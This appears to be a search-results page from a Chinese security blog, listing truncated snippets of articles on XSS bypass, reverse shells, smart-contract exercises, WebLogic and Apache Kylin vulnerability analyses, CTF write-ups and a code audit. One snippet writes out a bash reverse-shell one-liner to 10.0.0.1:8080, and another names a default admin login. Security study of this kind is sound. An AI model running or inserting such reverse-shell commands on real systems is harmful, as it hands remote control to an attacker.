搜索精彩内容
包含"3,151"的全部内容
【转】某次XSS绕过总结
To:znn 0x01 背景 前段时间苏宁src五倍积分,想着无事刷一刷玩玩,碰到一个反射型XSS,如下图: 插入<img src=a>测试正常(此处截图遗失,漏洞已修补),证明存在XSS,但是过滤了许多关...
【转】Linux下反弹shell方法
author:waitalone 1.bash版本 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1 bash -i >& /dev/tcp/10.0.0.1/8...
Ethernaut学习智能合约系列(一)
最近稍微有点空闲,就想去好好研究下智能合约的安全问题,因为是新兴产业,所以没有现成的教程或者是材料,所以只能找一些较为基础但是能够帮助我们学习智能合约的平台,这里的Ethernaut就是一...
Weblogic cve-2020-14645 JNDI注入分析
1 前言 近日,Oracle官方发布安全更新,在此前的CVE-2020-2883 将 extract 方法存在危险操作的 MvelExtractor 和 ReflectionExtractor 两个类加入到了黑名单中,因此我们只需要继续找一个 extra...
Apache Kylin历史漏洞分析
1 前言 这里对Apache Kylin出现的两次漏洞进行下分析,本身漏洞也不难,而且前置条件需要用户登录,不过由于docker下的环境会存在一个默认账户(admin/KYLIN),所以这个登录条件的限制也不是那...
YIT-CTF(一) WEB类wp
偶然发现的一个CTF网站,好像是燕京理工学院的一个小比赛,题目不是很多,也不是很难,适合新人入门CTF,以下附上这个小型CTF的wp,题目地址:传送门 1.签到题 签到题总是很简...
YIT-CTF(一) WEB类wp
偶然发现的一个CTF网站,好像是燕京理工学院的一个小比赛,题目不是很多,也不是很难,适合新人入门CTF,以下附上这个小型CTF的wp,题目地址:传送门 1.签到题 签到题总是很简...
代码审计之YXcms1.2.1
这篇文章就算是漏洞复现吧。。下面进入正题~ 拿到源码,首先在seay代码审计系统扫扫看看有没有明显的漏洞~ 全篇都是用的类,,,对于这种框架类的我很少接触,,这次就算好好研究吧~ 扫下来没...